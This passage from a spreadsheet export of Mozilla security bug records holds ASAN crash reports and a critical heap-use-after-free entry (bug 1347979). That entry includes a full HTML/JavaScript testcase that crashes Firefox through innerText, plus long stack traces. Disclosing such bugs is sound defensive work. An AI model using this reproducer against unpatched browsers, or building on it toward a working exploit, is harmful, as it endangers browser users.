    #9 0x7fd3076a07fd in nsTimerEvent::Run() /builds/slave/try-lnx64-dbg/build/xpcom/threads/nsTimerImpl.cpp:559
    #10 0x7fd30769332d in nsThread::ProcessNextEvent(bool, bool*) /builds/slave/try-lnx64-dbg/build/xpcom/threads/nsThread.cpp:624
    #11 0x7fd3075e49e3 in NS_ProcessNextEvent_P(nsIThread*, bool) /builds/slave/try-lnx64-dbg/build/obj-firefox/xpcom/build/nsThreadUtils.cpp:213
    #12 0x7fd3073f3cae in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) /builds/slave/try-lnx64-dbg/build/ipc/glue/MessagePump.cpp:113
    #13 0x7fd307718442 in MessageLoop::RunInternal() /builds/slave/try-lnx64-dbg/build/ipc/chromium/src/base/message_loop.cc:209
    #14 0x7fd30771832f in MessageLoop::Run() /builds/slave/try-lnx64-dbg/build/ipc/chromium/src/base/message_loop.cc:176
    #15 0x7fd3071b8c52 in nsBaseAppShell::Run() /builds/slave/try-lnx64-dbg/build/widget/xpwidgets/nsBaseAppShell.cpp:165
    #16 0x7fd306d77b41 in nsAppStartup::Run() /builds/slave/try-lnx64-dbg/build/toolkit/components/startup/nsAppStartup.cpp:256
    #17 0x7fd305187d43 in XREMain::XRE_mainRun() /builds/slave/try-lnx64-dbg/build/toolkit/xre/nsAppRunner.cpp:3765
    #18 0x7fd3051890e8 in XREMain::XRE_main(int, char**, nsXREAppData const*) /builds/slave/try-lnx64-dbg/build/toolkit/xre/nsAppRunner.cpp:3842
    #19 0x7fd305189b62 in XRE_main /builds/slave/try-lnx64-dbg/build/toolkit/xre/nsAppRunner.cpp:3918
    #20 0x4079c2 in do_main(int, char**) /builds/slave/try-lnx64-dbg/build/browser/app/nsBrowserApp.cpp:157
    #21 0x4071ba in main /builds/slave/try-lnx64-dbg/build/browser/app/nsBrowserApp.cpp:244
    #22 0x7fd30eaf5eff in __libc_start_main /build/buildd/eglibc-2.13/csu/libc-start.c:258
0x7fd2b6d89e80 is located 0 bytes to the right of 513-byte region [0x7fd2b6d89c80,0x7fd2b6d89e81)
allocated by thread T0 here:
    #0 0x4276a2 in malloc ??:0
    #1 0x7fd305579808 in imgFrame::Init(int, int, int, int, gfxASurface::gfxImageFormat, unsigned char) /builds/slave/try-lnx64-dbg/build/image/src/imgFrame.cpp:169
    #2 0x7fd305561b6e in mozilla::image::RasterImage::InternalAddFrame(unsigned int, int, int, int, int, gfxASurface::gfxImageFormat, unsigned char, unsigned char**, unsigned int*, unsigned int**, unsigned int*) /builds/slave/try-lnx64-dbg/build/image/src/RasterImage.cpp:1044
    #3 0x7fd3055623be in mozilla::image::RasterImage::EnsureFrame(unsigned int, int, int, int, int, gfxASurface::gfxImageFormat, unsigned char, unsigned char**, unsigned int*, unsigned int**, unsigned int*) /builds/slave/try-lnx64-dbg/build/image/src/RasterImage.cpp:1145
    #4 0x7fd3055b4e96 in mozilla::image::nsGIFDecoder2::BeginImageFrame(unsigned short) /builds/slave/try-lnx64-dbg/build/image/decoders/nsGIFDecoder2.cpp:185
    #5 0x7fd3055b8ecd in mozilla::image::nsGIFDecoder2::WriteInternal(char const*, unsigned int) /builds/slave/try-lnx64-dbg/build/image/decoders/nsGIFDecoder2.cpp:922
    #6 0x7fd305563fde in mozilla::image::RasterImage::WriteToDecoder(char const*, unsigned int) /builds/slave/try-lnx64-dbg/build/image/src/RasterImage.cpp:2378
    #7 0x7fd305568374 in mozilla::image::RasterImage::DecodeSomeData(unsigned int) /builds/slave/try-lnx64-dbg/build/image/src/RasterImage.cpp:2731
    #8 0x7fd305569105 in mozilla::image::RasterImage::DecodeWorker::DecodeSomeOfImage(mozilla::image::RasterImage*, mozilla::image::RasterImage::DecodeWorker::DecodeType) /builds/slave/try-lnx64-dbg/build/image/src/RasterImage.cpp:3028
    #9 0x7fd305568a7d in mozilla::image::RasterImage::DecodeWorker::Run() /builds/slave/try-lnx64-dbg/build/image/src/RasterImage.cpp:2957
    #10 0x7fd30769332d in nsThread::ProcessNextEvent(bool, bool*) /builds/slave/try-lnx64-dbg/build/xpcom/threads/nsThread.cpp:624
    #11 0x7fd3075e49e3 in NS_ProcessNextEvent_P(nsIThread*, bool) /builds/slave/try-lnx64-dbg/build/obj-firefox/xpcom/build/nsThreadUtils.cpp:213
    #12 0x7fd3073f3cc9 in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) /builds/slave/try-lnx64-dbg/build/ipc/glue/MessagePump.cpp:82
    #13 0x7fd307718442 in MessageLoop::RunInternal() /builds/slave/try-lnx64-dbg/build/ipc/chromium/src/base/message_loop.cc:209
    #14 0x7fd30771832f in MessageLoop::Run() /builds/slave/try-lnx64-dbg/build/ipc/chromium/src/base/message_loop.cc:176
    #15 0x7fd3071b8c52 in nsBaseAppShell::Run() /builds/slave/try-lnx64-dbg/build/widget/xpwidgets/nsBaseAppShell.cpp:165
    #16 0x7fd306d77b41 in nsAppStartup::Run() /builds/slave/try-lnx64-dbg/build/toolkit/components/startup/nsAppStartup.cpp:256
    #17 0x7fd305187d43 in XREMain::XRE_mainRun() /builds/slave/try-lnx64-dbg/build/toolkit/xre/nsAppRunner.cpp:3765
    #18 0x7fd3051890e8 in XREMain::XRE_main(int, char**, nsXREAppData const*) /builds/slave/try-lnx64-dbg/build/toolkit/xre/nsAppRunner.cpp:3842
    #19 0x7fd305189b62 in XRE_main /builds/slave/try-lnx64-dbg/build/toolkit/xre/nsAppRunner.cpp:3918
    #20 0x4079c2 in do_main(int, char**) /builds/slave/try-lnx64-dbg/build/browser/app/nsBrowserApp.cpp:157
    #21 0x4071ba in main /builds/slave/try-lnx64-dbg/build/browser/app/nsBrowserApp.cpp:244
==31319== ABORTING
Stats: 1296M malloced (1238M for red zones) by 2598427 calls
Stats: 340M realloced by 249611 calls
Stats: 1243M freed by 2350356 calls
Stats: 1114M really freed by 2040296 calls
Stats: 812M (208022 full pages) mmaped in 203 calls
  mmaps   by size class: 8:442341; 9:90101; 10:28665; 11:16376; 12:5120; 13:5120; 14:2048; 15:1024; 16:1088; 17:160; 18:208; 19:72; 20:140; 21:78; 22:1;
  mallocs by size class: 8:1938088; 9:399426; 10:123808; 11:66502; 12:21500; 13:26796; 14:10485; 15:6225; 16:4102; 17:434; 18:590; 19:92; 20:300; 21:78; 22:1;
  frees   by size class: 8:1733745; 9:371387; 10:116404; 11:61308; 12:20229; 13:25807; 14:9918; 15:6176; 16:3939; 17:423; 18:552; 19:91; 20:299; 21:77; 22:1;
  rfrees  by size class: 8:1508469; 9:319321; 10:101173; 11:53186; 12:17227; 13:22292; 14:8562; 15:5231; 16:3485; 17:382; 18:522; 19:89; 20:279; 21:77; 22:1;
Stats: malloc large: 1495 small slow: 14726
Shadow byte and word:
  0x1ffa56db13d0: 1
  0x1ffa56db13d0: 01 fb fb fb fb fb fb fb
More shadow bytes:
  0x1ffa56db13b0: 00 00 00 00 00 00 00 00
  0x1ffa56db13b8: 00 00 00 00 00 00 00 00
  0x1ffa56db13c0: 00 00 00 00 00 00 00 00
  0x1ffa56db13c8: 00 00 00 00 00 00 00 00
=&gt;0x1ffa56db13d0: 01 fb fb fb fb fb fb fb
  0x1ffa56db13d8: fb fb fb fb fb fb fb fb
  0x1ffa56db13e0: fa fa fa fa fa fa fa fa
  0x1ffa56db13e8: fa fa fa fa fa fa fa fa
  0x1ffa56db13f0: fa fa fa fa fa fa fa fa</t>
        </is>
      </c>
      <c r="X2158" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2159">
      <c r="A2159" t="n">
        <v>1347979</v>
      </c>
      <c r="B2159" t="inlineStr">
        <is>
          <t>2017-03-16 09:12:20 -0700</t>
        </is>
      </c>
      <c r="C2159" t="inlineStr">
        <is>
          <t>heap-use-after-free in GetRequiredInnerTextLineBreakCount</t>
        </is>
      </c>
      <c r="D2159" t="inlineStr">
        <is>
          <t>2024-05-30 09:30:41 -0700</t>
        </is>
      </c>
      <c r="E2159" t="n">
        <v>1</v>
      </c>
      <c r="F2159" t="n">
        <v>1</v>
      </c>
      <c r="G2159" t="n">
        <v>3</v>
      </c>
      <c r="H2159" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2159" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2159" t="inlineStr">
        <is>
          <t>DOM: Core &amp; HTML</t>
        </is>
      </c>
      <c r="K2159" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L2159" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2159" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2159" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2159" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2159" t="inlineStr">
        <is>
          <t>[adv-main53+][adv-esr52.1+][adv-esr45.9+]</t>
        </is>
      </c>
      <c r="Q2159" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2159" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S2159" t="inlineStr">
        <is>
          <t>mozilla55</t>
        </is>
      </c>
      <c r="T2159" t="n">
        <v>1</v>
      </c>
      <c r="U2159" t="n">
        <v>0</v>
      </c>
      <c r="V2159" t="n">
        <v>18</v>
      </c>
      <c r="W2159" t="inlineStr">
        <is>
          <t>The following testcase crashes the latest ASAN build of Firefox (BuildID=20170316115330)
&lt;script&gt;
function start() {
	o0=document.createElementNS('http://www.w3.org/1999/xhtml','iframe');
	o0.src="data:text/html,&lt;div&gt;&lt;div&gt;&lt;div&gt;";
	o0.addEventListener('load', fun0,false);
	document.body.appendChild(o0);
	o2=window.document.documentElement;
}
function fun0() {
	o4=o0.contentDocument;
	tmp=o4.getElementsByTagName('*');
	o5=tmp[0];
	o7=tmp[4];
	o0.contentWindow.onresize=fun1;
	o0.width='-4px';
	o7.innerHTML='&lt;rp&gt;&lt;style&gt;*{ display: ruby-text-container;&lt;/style&gt; a';
	o5.innerText;
}
function fun1() {
	o2.textContent='undefined';
}
&lt;/script&gt;
&lt;body onload="start()"&gt;&lt;/body&gt;
ASAN output:
=================================================================
==7691==ERROR: AddressSanitizer: heap-use-after-free on address 0x6250003cb680 at pc 0x7f3175181423 bp 0x7ffeb6ea8e30 sp 0x7ffeb6ea8e28
READ of size 8 at 0x6250003cb680 thread T0 (Web Content)
    #0 0x7f3175181422 in GetContent /home/worker/workspace/build/src/obj-firefox/dist/include/nsIFrame.h:676:43
    #1 0x7f3175181422 in GetRequiredInnerTextLineBreakCount /home/worker/workspace/build/src/dom/base/nsRange.cpp:3487
    #2 0x7f3175181422 in nsRange::GetInnerTextNoFlush(mozilla::dom::DOMString&amp;, mozilla::ErrorResult&amp;, nsIContent*, unsigned int, nsIContent*, unsigned int) /home/worker/workspace/build/src/dom/base/nsRange.cpp:3588
    #3 0x7f317709e5eb in nsGenericHTMLElement::GetInnerText(mozilla::dom::DOMString&amp;, mozilla::ErrorResult&amp;) /home/worker/workspace/build/src/dom/html/nsGenericHTMLElement.cpp:2984:3
    #4 0x7f31765e67fb in mozilla::dom::HTMLElementBinding::get_innerText(JSContext*, JS::Handle&lt;JSObject*&gt;, nsGenericHTMLElement*, JSJitGetterCallArgs) /home/worker/workspace/build/src/obj-firefox/dom/bindings/HTMLElementBinding.cpp:250:9
    #5 0x7f31768d089c in mozilla::dom::GenericBindingGetter(JSContext*, unsigned int, JS::Value*) /home/worker/workspace/build/src/dom/bindings/BindingUtils.cpp:2843:13
    #6 0x7f317c05c361 in CallJSNative /home/worker/workspace/build/src/js/src/jscntxtinlines.h:282:15
    #7 0x7f317c05c361 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:448
    #8 0x7f317c05d97f in InternalCall /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:493:12
    #9 0x7f317c05d97f in Call /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:512
    #10 0x7f317c05d97f in js::CallGetter(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, JS::MutableHandle&lt;JS::Value&gt;) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:627
    #11 0x7f317cedc605 in CallGetter /home/worker/workspace/build/src/js/src/vm/NativeObject.cpp:1832:16
    #12 0x7f317cedc605 in GetExistingProperty&lt;js::AllowGC::CanGC&gt; /home/worker/workspace/build/src/js/src/vm/NativeObject.cpp:1880
    #13 0x7f317cedc605 in NativeGetPropertyInline&lt;js::AllowGC::CanGC&gt; /home/worker/workspace/build/src/js/src/vm/NativeObject.cpp:2111
    #14 0x7f317cedc605 in js::NativeGetProperty(JSContext*, JS::Handle&lt;js::NativeObject*&gt;, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;jsid&gt;, JS::MutableHandle&lt;JS::Value&gt;) /home/worker/workspace/build/src/js/src/vm/NativeObject.cpp:2145
    #15 0x7f317cc5bd4d in GetProperty /home/worker/workspace/build/src/js/src/vm/NativeObject.h:1442:12
    #16 0x7f317cc5bd4d in js::Wrapper::get(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;jsid&gt;, JS::MutableHandle&lt;JS::Value&gt;) const /home/worker/workspace/build/src/js/src/proxy/Wrapper.cpp:143
    #17 0x7f317cc10865 in js::CrossCompartmentWrapper::get(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;jsid&gt;, JS::MutableHandle&lt;JS::Value&gt;) const /home/worker/workspace/build/src/js/src/proxy/CrossCompartmentWrapper.cpp:226:23
    #18 0x7f317cc39510 in js::Proxy::get(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;jsid&gt;, JS::MutableHandle&lt;JS::Value&gt;) /home/worker/workspace/build/src/js/src/proxy/Proxy.cpp:325:21
    #19 0x7f317c064c0b in GetProperty /home/worker/workspace/build/src/js/src/vm/NativeObject.h:1441:16
    #20 0x7f317c064c0b in GetProperty /home/worker/workspace/build/src/js/src/jsobj.h:845
    #21 0x7f317c064c0b in js::GetProperty(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;js::PropertyName*&gt;, JS::MutableHandle&lt;JS::Value&gt;) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:4307
    #22 0x7f317c048281 in GetPropertyOperation /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:192:12
    #23 0x7f317c048281 in Interpret(JSContext*, js::RunState&amp;) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:2671
    #24 0x7f317c02b5ce in js::RunScript(JSContext*, js::RunState&amp;) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:394:12
    #25 0x7f317c05c4e6 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:466:15
    #26 0x7f317c05ccf2 in js::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, js::AnyInvokeArgs const&amp;, JS::MutableHandle&lt;JS::Value&gt;) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:512:10
    #27 0x7f317c9cfecb in JS::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, JS::HandleValueArray const&amp;, JS::MutableHandle&lt;JS::Value&gt;) /home/worker/workspace/build/src/js/src/jsapi.cpp:2887:12
    #28 0x7f317637a017 in mozilla::dom::EventListener::HandleEvent(JSContext*, JS::Handle&lt;JS::Value&gt;, mozilla::dom::Event&amp;, mozilla::ErrorResult&amp;) /home/worker/workspace/build/src/obj-firefox/dom/bindings/EventListenerBinding.cpp:47:8
    #29 0x7f3176ca5c88 in HandleEvent&lt;mozilla::dom::EventTarget *&gt; /home/worker/workspace/build/src/obj-firefox/dist/include/mozilla/dom/EventListenerBinding.h:65:12
    #30 0x7f3176ca5c88 in mozilla::EventListenerManager::HandleEventSubType(mozilla::EventListenerManager::Listener*, nsIDOMEvent*, mozilla::dom::EventTarget*) /home/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1120
    #31 0x7f3176ca7aaa in mozilla::EventListenerManager::HandleEventInternal(nsPresContext*, mozilla::WidgetEvent*, nsIDOMEvent**, mozilla::dom::EventTarget*, nsEventStatus*) /home/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1297:20
    #32 0x7f3176c930e1 in mozilla::EventTargetChainItem::HandleEventTargetChain(nsTArray&lt;mozilla::EventTargetChainItem&gt;&amp;, mozilla::EventChainPostVisitor&amp;, mozilla::EventDispatchingCallback*, mozilla::ELMCreationDetector&amp;) /home/worker/workspace/build/src/dom/events/EventDispatcher.cpp:465:16
    #33 0x7f3176c96632 in mozilla::EventDispatcher::Dispatch(nsISupports*, nsPresContext*, mozilla::WidgetEvent*, nsIDOMEvent*, nsEventStatus*, mozilla::EventDispatchingCallback*, nsTArray&lt;mozilla::dom::EventTarget*&gt;*) /home/worker/workspace/build/src/dom/events/EventDispatcher.cpp:822:9
    #34 0x7f3174ced50d in nsGlobalWindow::PostHandleEvent(mozilla::EventChainPostVisitor&amp;) /home/worker/workspace/build/src/dom/base/nsGlobalWindow.cpp:3815:7
    #35 0x7f3176c931d7 in PostHandleEvent /home/worker/workspace/build/src/dom/events/EventDispatcher.cpp:416:12
    #36 0x7f3176c931d7 in mozilla::EventTargetChainItem::HandleEventTargetChain(nsTArray&lt;mozilla::EventTargetChainItem&gt;&amp;, mozilla::EventChainPostVisitor&amp;, mozilla::EventDispatchingCallback*, mozilla::ELMCreationDetector&amp;) /home/worker/workspace/build/src/dom/events/EventDispatcher.cpp:468
    #37 0x7f3176c9375c in mozilla::EventTargetChainItem::HandleEventTargetChain(nsTArray&lt;mozilla::EventTargetChainItem&gt;&amp;, mozilla::EventChainPostVisitor&amp;, mozilla::EventDispatchingCallback*, mozilla::ELMCreationDetector&amp;) /home/worker/workspace/build/src/dom/events/EventDispatcher.cpp:518:5
    #38 0x7f3176c96632 in mozilla::EventDispatcher::Dispatch(nsISupports*, nsPresContext*, mozilla::WidgetEvent*, nsIDOMEvent*, nsEventStatus*, mozilla::EventDispatchingCallback*, nsTArray&lt;mozilla::dom::EventTarget*&gt;*) /home/worker/workspace/build/src/dom/events/EventDispatcher.cpp:822:9
    #39 0x7f3178dc91ec in nsDocumentViewer::LoadComplete(nsresult) /home/worker/workspace/build/src/layout/base/nsDocumentViewer.cpp:1043:7
    #40 0x7f317b1502d9 in nsDocShell::EndPageLoad(nsIWebProgress*, nsIChannel*, nsresult) /home/worker/workspace/build/src/docshell/base/nsDocShell.cpp:7671:21
    #41 0x7f317b14c538 in nsDocShell::OnStateChange(nsIWebProgress*, nsIRequest*, unsigned int, nsresult) /home/worker/workspace/build/src/docshell/base/nsDocShell.cpp:7465:7
    #42 0x7f317b15368f in non-virtual thunk to nsDocShell::OnStateChange(nsIWebProgress*, nsIRequest*, unsigned int, nsresult) /home/worker/workspace/build/src/docshell/base/nsDocShell.cpp:7362:13
    #43 0x7f3174063729 in nsDocLoader::DoFireOnStateChange(nsIWebProgress*, nsIRequest*, int&amp;, nsresult) /home/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:1258:3
    #44 0x7f31740626dc in nsDocLoader::doStopDocumentLoad(nsIRequest*, nsresult) /home/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:842:14
    #45 0x7f317405f578 in nsDocLoader::DocLoaderIsEmpty(bool) /home/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:732:9
    #46 0x7f31740613f2 in nsDocLoader::OnStopRequest(nsIRequest*, nsISupports*, nsresult) /home/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:614:5
    #47 0x7f317406211c in non-virtual thunk to nsDocLoader::OnStopRequest(nsIRequest*, nsISupports*, nsresult) /home/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:470:14
    #48 0x7f3172832352 in mozilla::net::nsLoadGroup::RemoveRequest(nsIRequest*, nsISupports*, nsresult) /home/worker/workspace/build/src/netwerk/base/nsLoadGroup.cpp:634:28
    #49 0x7f3175038b6b in nsDocument::DoUnblockOnload() /home/worker/workspace/build/src/dom/base/nsDocument.cpp:8858:18
    #50 0x7f317503873c in nsDocument::UnblockOnload(bool) /home/worker/workspace/build/src/dom/base/nsDocument.cpp:8784:9
    #51 0x7f317500f6ed in nsDocument::DispatchContentLoadedEvents() /home/worker/workspace/build/src/dom/base/nsDocument.cpp:5289:3
    #52 0x7f31750d8ce2 in applyImpl&lt;nsDocument, void (nsDocument::*)()&gt; /home/worker/workspace/build/src/obj-firefox/dist/include/nsThreadUtils.h:855:12
    #53 0x7f31750d8ce2 in apply&lt;nsDocument, void (nsDocument::*)()&gt; /home/worker/workspace/build/src/obj-firefox/dist/include/nsThreadUtils.h:861
    #54 0x7f31750d8ce2 in mozilla::detail::RunnableMethodImpl&lt;nsDocument*, void (nsDocument::*)(), true, false&gt;::Run() /home/worker/workspace/build/src/obj-firefox/dist/include/nsThreadUtils.h:890
    #55 0x7f317264ba61 in mozilla::ValidatingDispatcher::Runnable::Run() /home/worker/workspace/build/src/xpcom/threads/Dispatcher.cpp:259:32
    #56 0x7f317267f34c in nsThread::ProcessNextEvent(bool, bool*) /home/worker/workspace/build/src/xpcom/threads/nsThread.cpp:1269:14
    #57 0x7f317267bc78 in NS_ProcessNextEvent(nsIThread*, bool) /home/worker/workspace/build/src/xpcom/threads/nsThreadUtils.cpp:389:10
    #58 0x7f3173423de1 in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) /home/worker/workspace/build/src/ipc/glue/MessagePump.cpp:96:21
    #59 0x7f3173384940 in RunInternal /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:238:10
    #60 0x7f3173384940 in RunHandler /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:231
    #61 0x7f3173384940 in MessageLoop::Run() /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:211
    #62 0x7f31785e89af in nsBaseAppShell::Run() /home/worker/workspace/build/src/widget/nsBaseAppShell.cpp:156:27
    #63 0x7f317bc11f07 in XRE_RunAppShell() /home/worker/workspace/build/src/toolkit/xre/nsEmbedFunctions.cpp:854:22
    #64 0x7f3173384940 in RunInternal /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:238:10
    #65 0x7f3173384940 in RunHandler /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:231
    #66 0x7f3173384940 in MessageLoop::Run() /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:211
    #67 0x7f317bc11926 in XRE_InitChildProcess(int, char**, XREChildData const*) /home/worker/workspace/build/src/toolkit/xre/nsEmbedFunctions.cpp:686:34
    #68 0x4eb4b3 in content_process_main /home/worker/workspace/build/src/browser/app/../../ipc/contentproc/plugin-container.cpp:64:30
    #69 0x4eb4b3 in main /home/worker/workspace/build/src/browser/app/nsBrowserApp.cpp:286
    #70 0x7f318da7b82f in __libc_start_main /build/glibc-t3gR2i/glibc-2.23/csu/../csu/libc-start.c:291
    #71 0x41ce08 in _start (/home/nils/fuzzer3/firefox/firefox+0x41ce08)
0x6250003cb680 is located 5504 bytes inside of 8192-byte region [0x6250003ca100,0x6250003cc100)
freed by thread T0 (Web Content) here:
    #0 0x4bb33b in __interceptor_free /builds/slave/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:47:3
    #1 0x7f318ad52347 in FreeArenaList /home/worker/workspace/build/src/nsprpub/lib/ds/plarena.c:195:9
    #2 0x7f318ad52347 in PL_FinishArenaPool /home/worker/workspace/build/src/nsprpub/lib/ds/plarena.c:222
    #3 0x7f3178c5f00c in nsPresArena::~nsPresArena() /home/worker/workspace/build/src/layout/base/nsPresArena.cpp:56:3
    #4 0x7f3178cd689b in nsIPresShell::~nsIPresShell() /home/worker/workspace/build/src/obj-firefox/dist/include/nsIPresShell.h:182:7
    #5 0x7f3178cd6a3d in mozilla::PresShell::~PresShell() /home/worker/workspace/build/src/layout/base/PresShell.cpp:899:1
    #6 0x7f3178cd2314 in mozilla::PresShell::Release() /home/worker/workspace/build/src/layout/base/PresShell.cpp:893:1
    #7 0x7f3178adb884 in ~nsCOMPtr_base /home/worker/workspace/build/src/obj-firefox/dist/include/nsCOMPtr.h:294:7
    #8 0x7f3178adb884 in nsComputedDOMStyle::GetStyleContextForElement(mozilla::dom::Element*, nsIAtom*, nsIPresShell*, nsComputedDOMStyle::StyleType) /home/worker/workspace/build/src/layout/style/nsComputedDOMStyle.cpp:451
    #9 0x7f317517fe0f in ElementIsVisible /home/worker/workspace/build/src/dom/base/nsRange.cpp:3454:31
    #10 0x7f317517fe0f in nsRange::GetInnerTextNoFlush(mozilla::dom::DOMString&amp;, mozilla::ErrorResult&amp;, nsIContent*, unsigned int, nsIContent*, unsigned int) /home/worker/workspace/build/src/dom/base/nsRange.cpp:3583
    #11 0x7f317709e5eb in nsGenericHTMLElement::GetInnerText(mozilla::dom::DOMString&amp;, mozilla::ErrorResult&amp;) /home/worker/workspace/build/src/dom/html/nsGenericHTMLElement.cpp:2984:3
    #12 0x7f31765e67fb in mozilla::dom::HTMLElementBinding::get_innerText(JSContext*, JS::Handle&lt;JSObject*&gt;, nsGenericHTMLElement*, JSJitGetterCallArgs) /home/worker/workspace/build/src/obj-firefox/dom/bindings/HTMLElementBinding.cpp:250:9
    #13 0x7f31768d089c in mozilla::dom::GenericBindingGetter(JSContext*, unsigned int, JS::Value*) /home/worker/workspace/build/src/dom/bindings/BindingUtils.cpp:2843:13
    #14 0x7f317c05c361 in CallJSNative /home/worker/workspace/build/src/js/src/jscntxtinlines.h:282:15
    #15 0x7f317c05c361 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:448
    #16 0x7f317c05d97f in InternalCall /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:493:12
    #17 0x7f317c05d97f in Call /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:512
    #18 0x7f317c05d97f in js::CallGetter(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, JS::MutableHandle&lt;JS::Value&gt;) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:627
    #19 0x7f317cedc605 in CallGetter /home/worker/workspace/build/src/js/src/vm/NativeObject.cpp:1832:16
    #20 0x7f317cedc605 in GetExistingProperty&lt;js::AllowGC::CanGC&gt; /home/worker/workspace/build/src/js/src/vm/NativeObject.cpp:1880
    #21 0x7f317cedc605 in NativeGetPropertyInline&lt;js::AllowGC::CanGC&gt; /home/worker/workspace/build/src/js/src/vm/NativeObject.cpp:2111
    #22 0x7f317cedc605 in js::NativeGetProperty(JSContext*, JS::Handle&lt;js::NativeObject*&gt;, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;jsid&gt;, JS::MutableHandle&lt;JS::Value&gt;) /home/worker/workspace/build/src/js/src/vm/NativeObject.cpp:2145
    #23 0x7f317cc5bd4d in GetProperty /home/worker/workspace/build/src/js/src/vm/NativeObject.h:1442:12
    #24 0x7f317cc5bd4d in js::Wrapper::get(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;jsid&gt;, JS::MutableHandle&lt;JS::Value&gt;) const /home/worker/workspace/build/src/js/src/proxy/Wrapper.cpp:143
    #25 0x7f317cc10865 in js::CrossCompartmentWrapper::get(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;jsid&gt;, JS::MutableHandle&lt;JS::Value&gt;) const /home/worker/workspace/build/src/js/src/proxy/CrossCompartmentWrapper.cpp:226:23
    #26 0x7f317cc39510 in js::Proxy::get(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;jsid&gt;, JS::MutableHandle&lt;JS::Value&gt;) /home/worker/workspace/build/src/js/src/proxy/Proxy.cpp:325:21
    #27 0x7f317c064c0b in GetProperty /home/worker/workspace/build/src/js/src/vm/NativeObject.h:1441:16
    #28 0x7f317c064c0b in GetProperty /home/worker/workspace/build/src/js/src/jsobj.h:845
    #29 0x7f317c064c0b in js::GetProperty(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;js::PropertyName*&gt;, JS::MutableHandle&lt;JS::Value&gt;) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:4307
    #30 0x7f317c048281 in GetPropertyOperation /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:192:12
    #31 0x7f317c048281 in Interpret(JSContext*, js::RunState&amp;) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:2671
    #32 0x7f317c02b5ce in js::RunScript(JSContext*, js::RunState&amp;) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:394:12
    #33 0x7f317c05c4e6 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:466:15
    #34 0x7f317c05ccf2 in js::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, js::AnyInvokeArgs const&amp;, JS::MutableHandle&lt;JS::Value&gt;) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:512:10
